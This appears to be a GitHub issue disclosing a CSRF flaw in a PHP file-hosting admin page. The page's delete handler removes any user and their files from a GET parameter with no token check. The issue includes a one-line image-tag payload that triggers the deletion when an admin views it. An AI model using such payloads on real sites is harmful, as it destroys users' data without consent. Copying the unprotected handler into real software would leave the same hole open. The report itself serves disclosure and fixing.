Open ghost opened 7 years ago
/admin/manuser.php
if (isset($_GET['delete'])) { $file_list = $db->select('file', array('owner' => $_GET['delete'])); if (is_array($file_list)) { foreach ($file_list as $d) { @unlink(dirname(dirname(__FILE__)).'/file/'.$d['realname'].'.data'); $db->delete('file', array('id' => $d['id'])); } } $dir_list = $db->select('dir', array('owner' => $_GET['delete'])); if (is_array($dir_list)) { foreach ($db->select('dir', array('owner' => $_GET['delete'])) as $d) { $db->delete('dir', array('id' => $d['id'])); } } $db->delete('user', array('name' => $_GET['delete'])); $alert = "<div class='alert alert-success'>刪除成功</div>"; }
Without a CSRF token, any existed user and his data could be deleted once the admin visits the following page:
<img src="http://localhost/admin/manuser.php?delete=victim" />
/admin/manuser.php
Without a CSRF token, any existed user and his data could be deleted once the admin visits the following page:
<img src="http://localhost/admin/manuser.php?delete=victim" />